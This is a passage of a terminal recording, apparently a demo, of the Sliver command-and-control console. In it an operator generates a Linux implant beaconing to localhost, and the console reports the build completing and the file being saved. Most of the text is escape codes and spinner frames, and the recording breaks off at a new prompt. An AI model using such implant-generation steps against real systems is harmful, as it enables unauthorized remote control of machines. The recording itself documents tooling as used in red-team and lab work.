"\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[7.582893, "o", "\u001b[6n"] +[7.588532, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[7.589563, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[31D\u001b[9C\u001b[133D\u001b[31C\u001b[?25h"] +[8.661792, "o", "\u001b[?25l\u001b[133D"] +[8.662831, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.668099, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[32D\u001b[9C\u001b[133D\u001b[32C\u001b[?25h"] +[8.781114, "o", "\u001b[?25l"] +[8.785696, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.795978, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[33D\u001b[9C"] +[8.797639, "o", "\u001b[133D\u001b[33C\u001b[?25h"] +[9.534462, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[9.549545, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--o\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[9.550816, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[34D\u001b[9C\u001b[133D\u001b[34C\u001b[?25h"] +[9.594709, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[9.596247, "o", "\u001b[6n"] +[9.599261, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[35D\u001b[9C\u001b[133D\u001b[35C\u001b[?25h"] +[9.709504, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[9.71435, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[36D\u001b[9C\u001b[133D\u001b[36C\u001b[?25h"] +[9.947512, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[9.950303, "o", "\u001b[6n"] +[9.955871, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22ml\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[9.95709, "o", "\u001b[133D\u001b[1A\u001b[37D\u001b[9C\u001b[133D\u001b[37C\u001b[?25h"] +[9.991716, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[9.9942, "o", "\u001b[6n"] +[9.998267, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mli\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[38D\u001b[9C\u001b[133D\u001b[38C\u001b[?25h"] +[10.120415, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[10.128315, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlin\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[10.129932, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[39D\u001b[9C\u001b[133D\u001b[39C\u001b[?25h"] +[10.265526, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[10.269356, "o", "\u001b[6n"] +[10.27651, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinu\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[10.277159, "o", "\u001b[0K"] +[10.277858, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[40D\u001b[9C\u001b[133D\u001b[40C\u001b[?25h"] +[10.444822, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[10.455164, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[41D"] +[10.456268, "o", "\u001b[9C\u001b[133D\u001b[41C\u001b[?25h"] +[10.597066, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[10.613889, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[42D\u001b[9C\u001b[133D\u001b[42C\u001b[?25h"] +[11.142973, "o", "\u001b[?25l"] +[11.154968, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.161529, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[43D\u001b[9C\u001b[133D\u001b[43C\u001b[?25h"] +[11.322128, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[11.322878, "o", "\u001b[6n"] +[11.329983, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[11.331694, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[44D\u001b[9C\u001b[133D\u001b[44C\u001b[?25h"] +[11.556561, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.571056, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--s\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[11.573097, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[45D\u001b[9C\u001b[133D\u001b[45C\u001b[?25h"] +[11.68511, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.696859, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--sk\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[46D"] +[11.698563, "o", "\u001b[9C\u001b[133D\u001b[46C\u001b[?25h"] +[11.791302, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.79852, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--ski\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[11.800015, "o", "\u001b[133D\u001b[1A\u001b[47D\u001b[9C\u001b[133D\u001b[47C\u001b[?25h"] +[11.913696, "o", "\u001b[?25l"] +[11.914346, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.919647, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[11.920552, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[48D\u001b[9C\u001b[133D\u001b[48C\u001b[?25h"] +[12.290841, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[12.309675, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[12.311108, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[49D\u001b[9C\u001b[133D\u001b[49C\u001b[?25h"] +[12.471431, "o", "\u001b[?25l"] +[12.478421, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[12.480196, "o", "\u001b[6n"] +[12.486789, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-s\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[12.487923, "o", "\u001b[133D\u001b[1A\u001b[50D\u001b[9C\u001b[133D\u001b[50C\u001b[?25h"] +[12.764329, "o", "\u001b[1 q"] +[12.803934, "o", "\u001b[1 q"] +[12.8058, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[12.809783, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[12.81029, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[57D\u001b[9C\u001b[133D\u001b[57C\u001b[?25h"] +[14.080367, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[14.091517, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[14.092873, "o", "\u001b[133D\u001b[1A\u001b[58D\u001b[9C\u001b[133D\u001b[58C\u001b[?25h"] +[14.214769, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[14.228498, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[14.229843, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[59D\u001b[9C\u001b[133D\u001b[59C\u001b[?25h"] +[14.414986, "o", "\u001b[?25l"] +[14.42208, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[14.439069, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--d\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[14.440762, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[60D\u001b[9C\u001b[133D\u001b[60C\u001b[?25h"] +[14.490223, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[14.492231, "o", "\u001b[6n"] +[14.497037, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--de\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[61D"] +[14.497271, "o", "\u001b[9C\u001b[133D\u001b[61C\u001b[?25h"] +[14.599131, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[14.601153, "o", "\u001b[6n"] +[14.605548, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--deb\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[14.606542, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[62D\u001b[9C\u001b[133D\u001b[62C\u001b[?25h"] +[14.618408, "o", "\u001b[?25l\u001b[133D"] +[14.618726, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[14.62055, "o", "\u001b[6n"] +[14.625097, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debu\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[14.625437, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[63D\u001b[9C\u001b[133D\u001b[63C\u001b[?25h"] +[14.855902, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[14.86238, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[14.864107, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[64D\u001b[9C\u001b[133D\u001b[64C\u001b[?25h"] +[15.749058, "o", "\u001b[64D\u001b[9C\u001b[6n"] +[15.761286, "o", "\u001b[133D\u001b[64C\u001b[0J\u001b[133D\r\r\n"] +[15.765136, "o", "\u001b[0 q"] +[15.768227, "o", "\r\n"] +[15.803258, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mGenerating new linux/amd64 implant binary\r\n"] +[15.904149, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[16.005203, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[16.105965, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[16.206781, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[16.311194, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[16.41465, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[16.51803, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[16.623758, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[16.718871, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[16.819526, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[16.924809, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[17.02678, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[17.127171, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[17.227426, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[17.328042, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[17.428737, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[17.529457, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[17.630094, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[17.732161, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[17.833984, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[17.936291, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[18.039656, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[18.140024, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[18.240869, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[18.341981, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[18.442275, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[18.54297, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[18.643513, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[18.744079, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[18.844525, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[18.945429, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[19.046162, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[19.14703, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[19.247855, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[19.348841, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[19.449544, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[19.550658, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[19.651443, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[19.754965, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[19.855357, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[19.95587, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[20.056202, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[20.157259, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[20.257933, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[20.358934, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[20.459548, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[20.564369, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[20.665382, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[20.767974, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[20.868518, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[20.973375, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[21.07398, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[21.178138, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[21.278962, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[21.379944, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[21.480337, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[21.582121, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[21.684478, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[21.785313, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[21.886096, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[21.987152, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[22.088001, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[22.189108, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[22.289674, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[22.390726, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[22.491814, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[22.592775, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[22.693718, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[22.794642, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[22.895611, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[22.995772, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[23.096369, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[23.198018, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[23.298959, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[23.399174, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[23.502714, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[23.603408, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[23.70356, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[23.804803, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[23.905923, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[24.006679, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[24.108007, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[24.208928, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[24.309787, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[24.410978, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[24.511347, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[24.611956, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[24.712921, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[24.814289, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[24.91523, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[25.016194, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[25.117255, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[25.218339, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[25.319097, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[25.41977, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[25.520035, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[25.62074, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[25.722191, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[25.823081, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[25.923163, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[26.023888, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[26.12481, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[26.225078, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[26.325274, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[26.426144, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[26.527424, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[26.628631, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[26.729415, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[26.830057, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[26.930825, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[27.031493, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[27.132354, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[27.233695, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[27.334517, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[27.43576, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[27.539277, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[27.643729, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[27.744542, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[27.845531, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[27.945804, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[28.050552, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[28.151408, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[28.25216, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[28.352809, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[28.453419, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[28.554095, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[28.656409, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[28.757146, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[28.85769, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[28.958292, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[29.058872, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[29.159389, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[29.263979, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[29.364603, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[29.469129, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[29.570605, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[29.67439, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[29.775243, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[29.875856, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[29.976192, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[30.053071, "o", "\r\u001b[2K"] +[30.053967, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mBuild completed in 14s\r\n"] +[30.067739, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mImplant saved to /root/CURRENT_RESIST\r\n"] +[30.067862, "o", "\r\n"] +[30.076528, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[30.077096, "o", "\u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[30.079221, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[9D\u001b[9C\u001b[133D\u001b[9C\u001b[?25h"] +[31.082554, "o", "\u001b[?25l"] +[31.098384, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[31.099203, "o", "\u001b[6n"] +[31.102798, "o", "i\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[10D\u001b[9C"] +[31.105621, "o", "\u001b[133D\u001b[10C\u001b[?25h"] +[31.147416, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[31.147602, "o", "\u001b[6n"] +[31.150768, "o", 